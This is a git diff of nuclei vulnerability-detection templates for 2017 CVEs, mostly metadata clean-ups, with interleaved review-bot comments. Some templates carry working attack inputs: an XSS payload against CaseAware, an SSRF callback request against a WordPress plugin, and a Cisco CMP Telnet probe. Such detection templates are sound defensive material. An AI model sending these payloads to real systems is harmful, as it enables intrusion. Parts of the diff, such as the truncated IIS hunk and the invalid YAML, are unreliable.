diff --git a/cves/2017/CVE-2017-17562.yaml b/cves/2017/CVE-2017-17562.yaml
index 7560cc422d..2289e470e0 100644
--- a/cves/2017/CVE-2017-17562.yaml
+++ b/cves/2017/CVE-2017-17562.yaml
@@ -2,19 +2,20 @@ id: CVE-2017-17562
info:
name: Embedthis GoAhead RCE
- description: Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked.
author: geeknik
+ severity: high
+ description: Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked.
reference:
- https://www.elttam.com/blog/goahead/
- https://github.com/ivanitlearning/CVE-2017-17562
- https://github.com/vulhub/vulhub/tree/master/goahead/CVE-2017-17562
- severity: high
- tags: cve,cve2017,rce,embedthis,goahead,fuzz
+ - https://github.com/embedthis/goahead/issues/249
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 8.10
+ cvss-score: 8.1
cve-id: CVE-2017-17562
cwe-id: CWE-20
+ tags: cve,cve2017,rce,goahead,fuzz
requests:
- raw:
diff --git a/cves/2017/CVE-2017-18024.yaml b/cves/2017/CVE-2017-18024.yaml
index 89de79241d..f10df9314d 100644
--- a/cves/2017/CVE-2017-18024.yaml
+++ b/cves/2017/CVE-2017-18024.yaml
@@ -4,18 +4,17 @@ info:
name: AvantFAX 3.3.3 XSS
author: pikpikcu
severity: medium
+ description: AvantFAX 3.3.3 has XSS via an arbitrary parameter name to the default URI, as demonstrated by a parameter whose name contains a SCRIPT element and whose value is 1.
reference:
- https://hackerone.com/reports/963798
- http://packetstormsecurity.com/files/145776/AvantFAX-3.3.3-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2017-18024
- description: |
- AvantFAX 3.3.3 has XSS via an arbitrary parameter name to the default URI, as demonstrated by a parameter whose name contains a SCRIPT element and whose value is 1.
- tags: cve,cve2017,xss,avantfax
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.10
+ cvss-score: 6.1
cve-id: CVE-2017-18024
cwe-id: CWE-79
+ tags: cve,cve2017,xss,avantfax
requests:
- raw:
diff --git a/cves/2017/CVE-2017-18536.yaml b/cves/2017/CVE-2017-18536.yaml
index 4f60e9dca3..dc426c5827 100644
--- a/cves/2017/CVE-2017-18536.yaml
+++ b/cves/2017/CVE-2017-18536.yaml
@@ -5,13 +5,15 @@ info:
author: daffainfo
severity: medium
description: The Stop User Enumeration WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability.
- reference: https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501
- tags: cve,cve2017,wordpress,xss,wp-plugin
+ reference:
+ - https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501
+ - https://wordpress.org/plugins/stop-user-enumeration/#developers
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.10
+ cvss-score: 6.1
cve-id: CVE-2017-18536
cwe-id: CWE-79
+ tags: cve,cve2017,wordpress,xss,wp-plugin
requests:
- method: GET
diff --git a/cves/2017/CVE-2017-18598.yaml b/cves/2017/CVE-2017-18598.yaml
new file mode 100644
index 0000000000..3cf6ea4c44
--- /dev/null
+++ b/cves/2017/CVE-2017-18598.yaml
@@ -0,0 +1,35 @@
+id: CVE-2017-18598
+
+info:
+ name: Qards Plugin - Stored XSS and SSRF
+ author: pussycat0x
+ severity: medium
+ description: The Qards plugin through 2017-10-11 for WordPress has XSS via a remote document specified in the url parameter to html2canvasproxy.php
+ reference:
+ - https://wpscan.com/vulnerability/8934
+ - https://wpscan.com/vulnerability/454a0ce3-ecfe-47fc-a282-5caa51370645
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-18598
+ - https://wpvulndb.com/vulnerabilities/8934
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2017-18598
+ cwe-id: CWE-79
+ tags: cve,cve2017,wordpress,ssrf,xss,wp-plugin,oast
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/qards/html2canvasproxy.php?url=https://{{interactsh-url}}'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "http"
+
+ - type: word
+ part: body
+ words:
+ - "console.log"
\ No newline at end of file
diff --git a/cves/2017/CVE-2017-18638.yaml b/cves/2017/CVE-2017-18638.yaml
index 47bbe28842..4cf8aec3d8 100644
--- a/cves/2017/CVE-2017-18638.yaml
+++ b/cves/2017/CVE-2017-18638.yaml
@@ -10,12 +10,12 @@ info:
- https://github.com/graphite-project/graphite-web/issues/2008
- https://github.com/advisories/GHSA-vfj6-275q-4pvm
- https://nvd.nist.gov/vuln/detail/CVE-2017-18638
- tags: cve,cve2017,graphite,ssrf,oast
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.50
+ cvss-score: 7.5
cve-id: CVE-2017-18638
cwe-id: CWE-918
+ tags: cve,cve2017,graphite,ssrf,oast
requests:
- method: GET
diff --git a/cves/2017/CVE-2017-3506.yaml b/cves/2017/CVE-2017-3506.yaml
index b19b9142da..6c17691b77 100644
--- a/cves/2017/CVE-2017-3506.yaml
+++ b/cves/2017/CVE-2017-3506.yaml
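Review bot: The CVE-2017-18598 template is named "Stored XSS and SSRF", but nothing in it exercises XSS, stored or otherwise: the request makes `html2canvasproxy.php` fetch `https://{{interactsh-url}}`, and the matchers only confirm an interactsh `http` callback plus `console.log` in the body, which is evidence of SSRF alone. Either rename to `name: Qards Plugin - Server-Side Request Forgery` (keeping NVD's `cwe-id: CWE-79` is fine, but the description should say the XSS half of the advisory is not tested) or add a check for a reflected payload. What `console.log` is meant to prove is not stated — presumably the proxy wraps the fetched document in a JS call — so once verified, a one-line comment above that matcher (`# proxy echoes the fetched document inside a console.log(...) call`) would spare the next maintainer a guess. The file also lacks a trailing newline, unlike the other templates touched in this commit.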
@@ -1,18 +1,20 @@
id: CVE-2017-3506
info:
- name: Oracle Weblogic Remote OS Command Execution
+ name: Oracle Fusion Middleware Weblogic Server - Remote OS Command Execution
author: pdteam
- description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server.
severity: high
- tags: cve,cve2017,weblogic,oracle,rce,oast
+ description: The Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2 is susceptible to a difficult to exploit vulnerability that could allow unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server.
reference:
- https://hackerone.com/reports/810778
- https://nvd.nist.gov/vuln/detail/CVE-2017-3506
+ - http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html
+ - http://www.securityfocus.com/bid/97884
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
- cvss-score: 7.40
+ cvss-score: 7.4
cve-id: CVE-2017-3506
+ tags: cve,cve2017,weblogic,oracle,rce,oast
requests:
- raw:
@@ -41,6 +43,8 @@ requests:
matchers:
- type: word
- part: interactsh_protocol # Confirms the HTTP Interaction
+ part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
+
+# Enhanced by mp on 2022/04/20
diff --git a/cves/2017/CVE-2017-3528.yaml b/cves/2017/CVE-2017-3528.yaml
index 3163825810..b0ea8cdf0b 100644
--- a/cves/2017/CVE-2017-3528.yaml
+++ b/cves/2017/CVE-2017-3528.yaml
@@ -4,16 +4,18 @@ info:
name: Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect
author: 0x_Akoko
severity: medium
+ description: 'The Oracle Applications Framework component of Oracle E-Business Suite (subcomponent: Popup windows (lists of values, datepicker, etc.)) is impacted by open redirect issues in versions 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. These easily exploitable vulnerabilities allow unauthenticated attackers with network access via HTTP to compromise Oracle Applications Framework. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Applications Framework, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Framework accessible data.'
reference:
- https://blog.zsec.uk/cve-2017-3528/
- https://www.exploit-db.com/exploits/43592
- tags: cve,cve2017,oracle,redirect
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-3528
+ - http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
- cvss-score: 5.40
+ cvss-score: 5.4
cve-id: CVE-2017-3528
cwe-id: CWE-601
- description: "Vulnerability in the Oracle Applications Framework component of Oracle E-Business Suite (subcomponent: Popup windows (lists of values, datepicker, etc.)). Supported versions that are affected are 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. Easily \"exploitable\" vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Applications Framework. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Applications Framework, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Framework accessible data. CVSS 3.0 Base Score 4.7 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N)."
+ tags: cve,cve2017,oracle,redirect
requests:
- method: GET
@@ -24,4 +26,6 @@ requests:
- type: word
words:
- 'noresize src="/\example.com?configName='
- part: body
\ No newline at end of file
+ part: body
+
+# Enhanced by mp on 2022/04/14
diff --git a/cves/2017/CVE-2017-3881.yaml b/cves/2017/CVE-2017-3881.yaml
index e852d525d0..ab883c8f87 100644
--- a/cves/2017/CVE-2017-3881.yaml
+++ b/cves/2017/CVE-2017-3881.yaml
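Review bot: The removed `description:` was the only place in this file recording Oracle's own scoring for CVE-2017-3528 — "CVSS 3.0 Base Score 4.7" with vector `S:C/C:N/I:L/A:N` — while `classification:` keeps `cvss-score: 5.4` and `S:U/C:L/I:L/A:N`; the two disagree on scope and on confidentiality impact, and after this hunk nothing says which source the classification follows. Confirm that 5.4 / `S:U/C:L/I:L` is what NVD publishes (the NVD link is now in `reference:`) and, if so, leave a one-line note such as `# classification follows NVD; Oracle's advisory scores this 4.7 (S:C/C:N/I:L)` so the discrepancy is not rediscovered by the next editor. If it is not, the classification should be corrected rather than the vendor vector silently dropped.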
@@ -1,20 +1,22 @@
id: CVE-2017-3881
info:
- name: Cisco IOS 12.2(55)SE11 Remote Code Execution
+ name: Cisco IOS 12.2(55)SE11 - Remote Code Execution
author: dwisiswant0
severity: critical
+ description: |
+ A vulnerability in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges. The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. The vulnerability is due to the combination of two factors: (1) the failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device; and (2) the incorrect processing of malformed CMP-specific Telnet options. An attacker could exploit this vulnerability by sending malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device configured to accept Telnet connections. An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device. This affects Catalyst switches, Embedded Service 2020 switches, Enhanced Layer 2 EtherSwitch Service Module, Enhanced Layer 2/3 EtherSwitch Service Module, Gigabit Ethernet Switch Module (CGESM) for HP, IE Industrial Ethernet switches, ME 4924-10GE switch, RF Gateway 10, and SM-X Layer 2/3 EtherSwitch Service Module. Cisco Bug IDs: CSCvd48893.
reference:
- https://github.com/artkond/cisco-rce
- https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/
- https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/dos/cisco/ios_telnet_rocem.md
- description: RCE exploit code is available for Cisco Catalyst 2960 switch model. This exploit is firmware dependent.
- tags: cve,cve2017,cisco,rce,network
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-3881
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.80
+ cvss-score: 9.8
cve-id: CVE-2017-3881
cwe-id: CWE-20
+ tags: cve,cve2017,cisco,rce,network
network:
- inputs:
@@ -22,10 +24,15 @@ network:
read: 1024
- data: "show priv"
read: 1024
+
host:
- - "{{Hostname}}:23"
+ - "{{Hostname}}"
+ - "{{Host}}:23"
+ read-size: 1024
matchers:
- type: word
words:
- - "Current privilege level is"
\ No newline at end of file
+ - "Current privilege level is"
+
+# Enhanced by mp on 2022/05/11
diff --git a/cves/2017/CVE-2017-4011.yaml b/cves/2017/CVE-2017-4011.yaml
index 835026085e..77cda0cb40 100644
--- a/cves/2017/CVE-2017-4011.yaml
+++ b/cves/2017/CVE-2017-4011.yaml
@@ -9,12 +9,12 @@ info:
- https://medium.com/@david.valles/cve-2017-4011-reflected-xss-found-in-mcafee-network-data-loss-prevention-ndlp-9-3-x-cf20451870ab
- https://kc.mcafee.com/corporate/index?page=content&id=SB10198
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-4011
- tags: cve,cve2017,mcafee,xss
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.10
+ cvss-score: 6.1
cve-id: CVE-2017-4011
cwe-id: CWE-79
+ tags: cve,cve2017,mcafee,xss
requests:
- method: GET
diff --git a/cves/2017/CVE-2017-5487.yaml b/cves/2017/CVE-2017-5487.yaml
index 75f2ff83e6..e5f089001f 100644
--- a/cves/2017/CVE-2017-5487.yaml
+++ b/cves/2017/CVE-2017-5487.yaml
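Review bot: The new `description:` for CVE-2017-3881 says the CMP Telnet flaw can "cause a reload of an affected device", and the `network:` block in the second hunk drives that same CMP/Telnet path to run `show priv`, yet the template now carries no operational warning — the old `This exploit is firmware dependent.` caveat was dropped and nothing replaced it. Add a comment above `network:` such as `# NOTE: this probes the CMP Telnet bug live; a malformed exchange can reload the switch (see description) and the exploit is firmware dependent - use only on authorised, non-production targets`. The host change to `"{{Hostname}}"` plus `"{{Host}}:23"` is the usual nuclei idiom for inputs with and without an explicit port and looks fine; the `inputs:` list that precedes `read: 1024` starts outside this view, so I cannot check what is sent before `show priv`.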
@@ -4,44 +4,43 @@ info:
name: WordPress Core < 4.7.1 - Username Enumeration
author: Manas_Harsh,daffainfo,geeknik
severity: medium
- description: wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request.
- tags: cve,cve2017,wordpress
+ description: WordPress Core < 4.7.1 is susceptible to user enumeration because it does not properly restrict listings of post authors via wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request.
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2017-5487
- https://www.exploit-db.com/exploits/41497
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-5487
+ - https://www.wordfence.com/blog/2016/12/wordfence-blocks-username-harvesting-via-new-rest-api-wp-4-7/
+ - https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
- cvss-score: 5.30
+ cvss-score: 5.3
cve-id: CVE-2017-5487
cwe-id: CWE-200
+ tags: cve,cve2017,wordpress
requests:
- method: GET
path:
- "{{BaseURL}}/wp-json/wp/v2/users/"
- "{{BaseURL}}/?rest_route=/wp/v2/users/"
- stop-at-first-match: true
matchers-condition: and
matchers:
+ - type: status
+ status:
+ - 200
- type: word
part: header
words:
- "application/json"
-
- - type: status
- status:
- - 200
-
- type: word
words:
- '"id":'
- '"name":'
- '"avatar_urls":'
condition: and
- extractors:
- - type: regex
- part: body
- regex:
- - '"name":"[^"]*"'
+ - type: json
+ json:
+ - '.[].name'
+
+# Enahnced by mp 03/31/2022
diff --git a/cves/2017/CVE-2017-5521.yaml b/cves/2017/CVE-2017-5521.yaml
index 7c792b2225..85bcc877f5 100644
--- a/cves/2017/CVE-2017-5521.yaml
+++ b/cves/2017/CVE-2017-5521.yaml
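Review bot: This hunk removes the `extractors:` line but keeps a list item under it, so on the new side `- type: json` follows the third matcher's `condition: and` with no parent key — at `matchers:` indentation nuclei has no `json` matcher type and should reject the template, and at any other indentation the item is orphaned; unless a context line was lost in this rendering, `extractors:` has to be re-added directly above `- type: json`. The trailer `# Enahnced by mp 03/31/2022` is misspelled and uses a different date format from every other file in the commit; make it `# Enhanced by mp on 2022/03/31`. Dropping `stop-at-first-match: true` also means both the `wp-json` and `?rest_route=` paths are always requested and a vulnerable site is reported twice; restore it unless double reporting is intended.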
@@ -1,4 +1,5 @@
id: CVE-2017-5521
+
info:
name: Bypassing Authentication on NETGEAR Routers
author: princechaddha
@@ -7,12 +8,14 @@ info:
reference:
- https://www.cvedetails.com/cve/CVE-2017-5521/
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/
- tags: cve,cve2017,auth-bypass
+ - http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability
+ - http://www.securityfocus.com/bid/95457
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 8.10
+ cvss-score: 8.1
cve-id: CVE-2017-5521
cwe-id: CWE-200
+ tags: cve,cve2017,auth-bypass,netgear
requests:
- method: GET
diff --git a/cves/2017/CVE-2017-5631.yaml b/cves/2017/CVE-2017-5631.yaml
new file mode 100644
index 0000000000..4833758109
--- /dev/null
+++ b/cves/2017/CVE-2017-5631.yaml
@@ -0,0 +1,39 @@
+id: CVE-2017-5631
+
+info:
+ name: CaseAware - Cross Site Scripting
+ author: edoardottt
+ severity: medium
+ description: An issue was discovered in KMCIS CaseAware. Reflected cross site scripting is present in the user parameter (i.e., "usr") that is transmitted in the login.php query string.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-5631
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5631
+ - https://www.openbugbounty.org/incidents/228262/
+ - https://www.exploit-db.com/exploits/42042/
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2017-5631
+ cwe-id: CWE-79
+ tags: cve,cve2017,xss,caseaware
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "'>"
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
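Review bot: As rendered here, the CVE-2017-5631 body matcher is the two-character string `'>`, which appears in virtually any HTML page (every quoted attribute that closes a tag), so the template would fire on the CaseAware login page whether or not the `usr` payload is reflected. If the committed file really matches only `'>`, tighten it to the verbatim reflected payload, `- "'></script><script>alert(document.domain)</script>"`; if the longer string is in the file and its script elements were stripped by this page's rendering, disregard this. The `text/html` header and 200 status checks are good to have but do not distinguish reflection from a normal login page, so the body word is the only thing carrying the detection.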
diff --git a/cves/2017/CVE-2017-5638.yaml b/cves/2017/CVE-2017-5638.yaml
index 0d112f3194..d26c34e467 100644
--- a/cves/2017/CVE-2017-5638.yaml
+++ b/cves/2017/CVE-2017-5638.yaml
@@ -1,16 +1,21 @@
id: CVE-2017-5638
+
info:
+ name: Apache Struts 2 - Remote Command Execution
author: Random_Robbie
- name: Apache Struts2 RCE
severity: critical
- description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attacker’s invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
- tags: cve,cve2017,struts,rce,apache
- reference: https://github.com/mazen160/struts-pwn
+ description: Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 is vulnerable to remote command injection attacks through incorrectly parsing an attacker's invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
+ reference:
+ - https://github.com/mazen160/struts-pwn
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-5638
+ - https://isc.sans.edu/diary/22169
+ - https://github.com/rapid7/metasploit-framework/issues/8064
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- cvss-score: 10.00
+ cvss-score: 10
cve-id: CVE-2017-5638
cwe-id: CWE-20
+ tags: cve,cve2017,struts,rce,apache
requests:
- raw:
@@ -25,4 +30,6 @@ requests:
- type: word
words:
- "X-Hacker: Bounty Plz"
- part: header
\ No newline at end of file
+ part: header
+
+# Enhanced by mp on 2022/04/26
diff --git a/cves/2017/CVE-2017-5982.yaml b/cves/2017/CVE-2017-5982.yaml
index 1f114f79b3..fe0f9bdd7f 100644
--- a/cves/2017/CVE-2017-5982.yaml
+++ b/cves/2017/CVE-2017-5982.yaml
@@ -1,4 +1,5 @@
id: CVE-2017-5982
+
info:
name: Kodi 17.1 Local File Inclusion
author: 0x_Akoko
@@ -7,6 +8,8 @@ info: reference: - https://cxsecurity.com/issue/WLB-2017020164 - https://www.cvedetails.com/cve/CVE-2017-5982 + - https://www.exploit-db.com/exploits/41312/ + - http://seclists.org/fulldisclosure/2017/Feb/27 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 diff --git a/cves/2017/CVE-2017-6090.yaml b/cves/2017/CVE-2017-6090.yaml index 38352df854..0a448dae64 100644 --- a/cves/2017/CVE-2017-6090.yaml +++ b/cves/2017/CVE-2017-6090.yaml @@ -1,17 +1,20 @@ id: CVE-2017-6090 info: - name: PhpCollab (unauthenticated) Arbitrary File Upload + name: PhpColl 2.5.1 Arbitrary File Upload author: pikpikcu severity: high - tags: cve,cve2017,phpcollab,rce,fileupload - reference: https://nvd.nist.gov/vuln/detail/CVE-2017-6090 + description: PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/ via clients/editclient.php. + reference: + - https://sysdream.com/news/lab/2017-09-29-cve-2017-6090-phpcollab-2-5-1-arbitrary-file-upload-unauthenticated/ + - https://nvd.nist.gov/vuln/detail/CVE-2017-6090 + - https://www.exploit-db.com/exploits/42934/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.80 + cvss-score: 8.8 cve-id: CVE-2017-6090 cwe-id: CWE-434 - description: "Unrestricted file upload vulnerability in clients/editclient.php in PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/." + tags: cve,cve2017,phpcollab,rce,fileupload requests: - raw: @@ -42,3 +45,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/04/06 diff --git a/cves/2017/CVE-2017-7269.yaml b/cves/2017/CVE-2017-7269.yaml index 533586dd4f..da5aedbc00 100644 --- a/cves/2017/CVE-2017-7269.yaml 
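Review bot: The renamed title `name: PhpColl 2.5.1 Arbitrary File Upload` drops letters from the product name; the description on the next changed line and the existing tag `phpcollab` both say PhpCollab, so this reads as a typo — suggest `name: PhpCollab 2.5.1 - Arbitrary File Upload`. Note also that the removed title said "(unauthenticated)" and the added sysdream reference URL says `unauthenticated`, while the new NVD-derived description says "remote authenticated users" and `cvss-metrics` keeps `PR:L`; a one-line comment stating which the request in this template actually relies on would resolve the contradiction for readers. The request itself is outside this hunk, so I could not check it.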
+++ b/cves/2017/CVE-2017-7269.yaml @@ -1,19 +1,22 @@ id: CVE-2017-7269 info: - name: Windows Server 2003 & IIS 6.0 RCE + name: Windows Server 2003 & IIS 6.0 - Remote Code Execution author: thomas_from_offensity,geeknik severity: critical - description: Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with "If ", dasl) # lowercase header name: DASL - regex("[\d]+(,\s+[\d]+)?", dav) # lowercase header name: DAV - regex(".*?PROPFIND", public) # lowercase header name: Public - regex(".*?PROPFIND", allow) # lowercase header name: Allow condition: or - part: header + + - type: status + status: + - 200 +# Enhanced by mp on 2022/05/11 diff --git a/cves/2017/CVE-2017-7391.yaml b/cves/2017/CVE-2017-7391.yaml index b17e18d01d..28c0c4ee93 100644 --- a/cves/2017/CVE-2017-7391.yaml +++ b/cves/2017/CVE-2017-7391.yaml @@ -1,19 +1,20 @@ id: CVE-2017-7391 info: - name: Magmi – Cross-Site Scripting v.0.7.22 + name: Magmi Cross-Site Scripting v.0.7.22 author: pikpikcu severity: medium description: A Cross-Site Scripting (XSS) was discovered in 'Magmi 0.7.22'. The vulnerability exists due to insufficient filtration of user-supplied data (prefix) passed to the 'magmi-git-master/magmi/web/ajax_gettime.php' URL. - tags: cve,cve2017,magmi,xss reference: - https://github.com/dweeves/magmi-git/issues/522 - https://github.com/dweeves/magmi-git/releases/download/0.7.22/magmi_full_0.7.22.zip + - https://github.com/dweeves/magmi-git/pull/525 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2017-7391 cwe-id: CWE-79 + tags: cve,cve2017,magmi,xss requests: - method: GET 
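Review bot: The added `- type: status` / `- 200` matcher, combined with the existing `or`-conditioned header regexes on `dasl`, `dav`, `public` and `allow`, still only fingerprints a WebDAV-enabled server that advertises PROPFIND — any WebDAV host, not specifically IIS 6.0 on Server 2003 — so a critical-severity result here is a feature fingerprint rather than evidence of the ScStoragePathFromUrl overflow named in the description. Consider adding a header word matcher on the IIS 6.0 server banner and a comment such as `# Fingerprints WebDAV on IIS 6.0; does not trigger the overflow` so consumers know to verify manually. Most of this hunk (the rest of the description through the request definition) appears truncated in this rendering after `"If <`, so the request method and `matchers-condition` could not be checked.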
@@ -25,12 +26,13 @@ requests: - type: status status: - 200 - - type: word - words: - - '"><' - part: body - type: word + part: body + words: + - '"><' + + - type: word + part: header words: - "text/html" - part: header \ No newline at end of file diff --git a/cves/2017/CVE-2017-7615.yaml b/cves/2017/CVE-2017-7615.yaml index 33787cf3bd..2c4e7785e0 100644 --- a/cves/2017/CVE-2017-7615.yaml +++ b/cves/2017/CVE-2017-7615.yaml @@ -1,25 +1,26 @@ id: CVE-2017-7615 +# THIS TEMPLATE IS ONLY FOR DETECTING +# To carry out further attacks, please see reference[2] below. +# This template works by guessing user ID. +# MantisBT before 1.3.10, 2.2.4, and 2.3.1, that can be downloaded on reference[1]. + info: - name: CVE-2017-7615 + name: MantisBT <=2.30 - Arbitrary Password Reset and Unauthenticated Admin Access author: bp0lr,dwisiswant0 severity: high description: MantisBT through 2.3.0 allows arbitrary password reset and unauthenticated admin access via an empty confirm_hash value to verify.php. - tags: cve,cve2017,mantisbt - - # THIS TEMPLATE IS ONLY FOR DETECTING - # To carry out further attacks, please see reference[2] below. - # This template works by guessing user ID. - # MantisBT before 1.3.10, 2.2.4, and 2.3.1, that can be downloaded on reference[1]. reference: - https://sourceforge.net/projects/mantisbt/files/mantis-stable/ - http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt - https://www.exploit-db.com/exploits/41890 + - http://www.openwall.com/lists/oss-security/2017/04/16/2 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.80 + cvss-score: 8.8 cve-id: CVE-2017-7615 cwe-id: CWE-640 + tags: cve,cve2017,mantisbt requests: - method: GET diff --git a/cves/2017/CVE-2017-7921.yaml b/cves/2017/CVE-2017-7921.yaml index 5a1fbdfe03..cd9e3b9bde 100644 --- a/cves/2017/CVE-2017-7921.yaml +++ b/cves/2017/CVE-2017-7921.yaml 
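Review bot: The new title `name: MantisBT <=2.30 - Arbitrary Password Reset and Unauthenticated Admin Access` gives a version that appears nowhere else in the file: the description says "through 2.3.0" and the relocated header comment says fixed in 1.3.10, 2.2.4 and 2.3.1, so `<=2.30` looks like a dropped dot. Suggest `name: MantisBT <=2.3.0 - Arbitrary Password Reset and Unauthenticated Admin Access`. Moving the four `#` comment lines above `info:` is fine, but they refer to `reference[1]` and `reference[2]` by position; the new fourth reference was appended at the end, so the indices still hold, just be aware the comment depends on list order.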
